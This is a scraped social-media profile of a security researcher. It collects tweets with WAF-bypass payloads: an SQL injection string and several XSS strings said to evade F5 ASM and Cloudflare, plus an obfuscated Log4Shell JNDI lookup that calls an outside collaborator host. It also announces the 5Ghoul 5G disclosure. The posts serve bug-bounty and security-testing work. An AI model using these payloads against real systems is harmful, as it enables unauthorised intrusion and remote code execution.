str0d's profile picture. hacker & hunter | trekker |  gamer | animal lover | CyberSec Entomologist at @CVEannounce

Strrr 🔻

@str0d

hacker & hunter | trekker | gamer | animal lover | CyberSec Entomologist at @CVEannounce

Say hello to 5Ghoul! 📶👻 Unveiling a #5G #NRAttacks PoC targeting smartphones, routers, and modems. asset-group.github.io/disclosures/5g… #5Ghoul #Cybersecurity

str0d's tweet image. Say hello to 5Ghoul! 📶👻 Unveiling a #5G #NRAttacks PoC targeting smartphones, routers, and modems. 
asset-group.github.io/disclosures/5g…
#5Ghoul #Cybersecurity

#Arithmetic operation based boolean injection with embedded queries to check SQLi, tested against F5 ASM +{`<F5>`/*strrr*/(')}div%0B1+' ▪️ Payload : {`%3CF5%3E`/*strrr*/821}+union+%23%0a+distinctrow%0b/**/select+1,2,3--{`%3CF5%3E`/**/TRUE} #SQL #Injection #WAF #bypass #F5 #ASM


Strrr 🔻 reposted

No user interaction file upload payload by @kkotowicz, available on @PortSwiggerRes XSS cheatsheet. bit.ly/3L0DClJ


Cross Site Scripting (XSS) Cloudflare WAF Bypass 🐸 Payload: <iframe+/ON+onload=%20alert(/str0d/)> Tested also on waf.cumulusfire.net #bugbountytips #infosec #CloudflareWAF #WAFBypass #AppSec #Cloudflare #Bypass #XSS #XssPayloads

str0d's tweet image. Cross Site Scripting (XSS) Cloudflare WAF Bypass 🐸

Payload: &amp;lt;iframe+/ON+onload=%20alert(/str0d/)&amp;gt;

Tested also on waf.cumulusfire.net

#bugbountytips #infosec #CloudflareWAF #WAFBypass
#AppSec #Cloudflare #Bypass #XSS #XssPayloads

Log4Shell Payload Bypass 403 cloudflare | WAFs 🤔 ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} 🤞🏻👾👻🕳️ #log4j #Log4Shell #log4jRCE  #bugbountytip #BugBounty #bypass #hackerone #hackthebox

str0d's tweet image. Log4Shell Payload Bypass 403 cloudflare | WAFs 🤔

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}

🤞🏻👾👻🕳️
#log4j #Log4Shell #log4jRCE  #bugbountytip #BugBounty #bypass #hackerone #hackthebox

A payload that bypasses F5 BIG-IP ASM 👾 ----------------------------------- --------------------------------- str0d"/><style>@keyframes x{}</style><str style="animation-name:x;" onanimationend="alert.bind()(22)"></str> ------------ LTD: 01/01-2021 12:47 @xsspayloads @ db

str0d's tweet image. A payload that bypasses F5 BIG-IP ASM 👾
-----------------------------------
---------------------------------
str0d&quot;/&amp;gt;&amp;lt;style&amp;gt;@keyframes x{}&amp;lt;/style&amp;gt;&amp;lt;str  onanimationend=&quot;alert.bind()(22)&quot;&amp;gt;&amp;lt;/str&amp;gt;
------------
LTD: 01/01-2021 12:47
@xsspayloads @ db


Loading...

Something went wrong.


Something went wrong.